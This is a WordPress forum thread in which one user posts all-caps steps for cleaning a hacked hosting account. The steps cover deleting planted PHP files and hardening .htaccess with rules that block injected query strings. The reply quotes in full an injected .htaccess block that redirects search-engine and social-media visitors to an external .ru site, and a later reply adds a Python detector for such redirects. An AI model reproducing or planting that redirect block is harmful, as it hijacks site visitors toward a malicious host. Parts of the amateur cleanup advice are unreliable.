boyxinfo
Forum Replies Created
Forum: Plugins
In reply to: I have been well and truly Hacked
THIS METHOD HAS BEEN WORKING FOR ME FOR 3 DAYS!!! IT'S FINALLY GONE!!!
To fix website malware issues: SUGGESTION: CHANGE ALL CPANEL & FTP ACCOUNT PASSWORDS then PROCEED (not the database passwords or WordPress installations) ONLY MAIN ACCOUNT AND FTP PASSWORDS
1. Update to the latest version of WordPress on each website installation (WordPress 3.3.1)
2. Add Plugin TimThumb Vulnerability Scanner to each website - Activate Plugin, Run/Scan
If it finds updates for you, check the updates and tell it to update.
3. Now locate any files on your server that stand out like (dhauei_cache.php), (ausdhuddeee.php) – I would say that it's safe to delete these files immediately!!! But continue deleting files at ur own risk. Use ur own judgement or even take a look at the coding inside. Do this for each separate website (normally these files will be found on the root of each website (ex. yourdomain.com/dhauei_cache.php)). But some may be found in other folders like:
/public_html/wp-content/uploads/_cache.php
/public_html/***/wp-includes/unzip.php
/public_html/*********/wp-includes/unzip.php
/public_html/*********/wp-content/uploads/_wp_cache.php
/www/wp-content/uploads/_cache.php
/www/*********/wp-includes/unzip.php
/www/*********/wp-content/uploads/_wp_cache.php
YOU NEED TO DELETE THESE FILES NOT THE DIRECTORIES/FOLDERS!!!!
4. Now go to your cpanel, locate home/yourservername/.htaccess (u should have access to this file), select it and click on change permissions (change from 444 to 644), click ok
Next click on the same file and hit EDIT
If u know what ur doing, add this code to the top of the .htaccess file
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
----THEN SCROLL THRU AND REMOVE ALL OTHER CODES THAT LOOK LIKE THIS BELOW----REMEMBER DELETE THE STUFF LIKE BELOW----
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
</IfModule>
----YOU MAY HAVE TO SCROLL THROUGH THE ENTIRE FILE BECAUSE SOMETIMES THE OTHER MALICIOUS CODES WILL BE AT THE BOTTOM----
ONCE YOU'RE DONE TAKING OUT ALL THE GARBAGE, THEN U CAN CLICK ON SAVE FILE. NOW THERE SHOULD BE A .htaccess in each separate website you own. If you come to a .htaccess that's already (chmod 644) - CHANCES ARE IT'S NOT AFFECTED SO U CAN VIEW THE FILE BY CLICKING EDIT, THEN ADDING THE LINES OF TEXT TO THE .HTACCESS OF EACH AND EVERY INDIVIDUAL WEBSITE (REMEMBERING TO CHMOD 644 EACH UNLESS THEY ARE ALREADY CHMODDED TO 644).
NOTE IF YOU HAVE A WORDPRESS INSTALLATION INSIDE A FOLDER (EX. yourdomain.com/wpblog/.htaccess) THEN YOU WILL NOT HAVE TO ADD THE LINE OF CODE TO THAT .HTACCESS FILE. REASON FOR THIS IS BECAUSE THE MALWARE HAS ONLY AFFECTED DIRECT ROOT FOLDERS
(ex. yourdomain1.com/.htaccess, yourdomain2.com/.htaccess, yourdomain3.com/.htaccess )
ONCE YOU'RE DONE EDITING AND SAVING THE .HTACCESS FILES (DEPENDING ON HOW MANY SITES YOU HOST) - YOU'RE DONE
SCAN YOUR WEBSITE WITH THE FOLLOWING FREE TOOL: https://sitecheck.sucuri.net/
YOUR SITE SHOULD COME BACK CLEAN AND FREE OF MALWARE!!!!!! Compliments of RCBUX.COM
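The checks from the post above, written so they can be run over every site on an account; this is an added example, not part of the original post. It flags RewriteRule lines that redirect to an external host under an HTTP_REFERER condition, and lists PHP files under uploads directories plus wp-includes/unzip.php for review. Flagging every PHP file under uploads generalizes the file names in the post; the function names and the host redirect.example are constructed for the illustration.

```python
import re
from pathlib import Path

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
EXTERNAL_URL = re.compile(r"^https?://([^/\s:]+)", re.I)


def referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, host) for each RewriteRule that sends visitors to an
    external host and is guarded by a RewriteCond on HTTP_REFERER."""
    findings, referer_pending = [], False
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        if REFERER_COND.match(line):
            referer_pending = True
            continue
        rule = REWRITE_RULE.match(line)
        if not rule:
            continue
        url = EXTERNAL_URL.match(rule.group(1))
        if referer_pending and url and url.group(1).lower() not in own_hosts:
            findings.append((line_no, url.group(1).lower()))
        referer_pending = False  # conditions apply only to the next RewriteRule
    return findings


def stray_php(web_root):
    """PHP files under any uploads directory, plus the wp-includes/unzip.php
    name from the post. Paths are reported for review, never deleted."""
    root = Path(web_root)
    hits = {p for p in root.rglob("*.php") if "uploads" in p.relative_to(root).parts}
    hits |= {p for p in root.rglob("unzip.php") if p.parent.name == "wp-includes"}
    return sorted(p.relative_to(root).as_posix() for p in hits)


# Constructed sample: the shape of the injected block, with a placeholder host.
SAMPLE = """\
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\\.(.*)
RewriteRule ^(.*)$ https://redirect.example/astro/index.php [R=301,L]
</IfModule>
"""

if __name__ == "__main__":
    print(referer_redirects(SAMPLE))
```

Pass the site's own hostnames as own_hosts so legitimate canonical-domain redirects are not reported.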
Forum: Plugins
In reply to: I have been well and truly Hacked
Weird that I have a hosting account with LunarPages and they called me 3 days ago asking me if I wanted them to remove the backup server files on my account. I have regular backups of my websites so I told them to delete it. Fast forward days later, I started getting the redirects on my server. Seems they were aware of this going to happen and wanted to remove any backups possible. Kinda sketchy to me plus I just renewed my hosting account with them. I think they are money hungry greedy bastards and are aware of this but haven't acted upon this. I will give them a call and see what's going on because I haven't been able to resolve this on my own. I correct the htaccess files then minutes later, they rewrite again.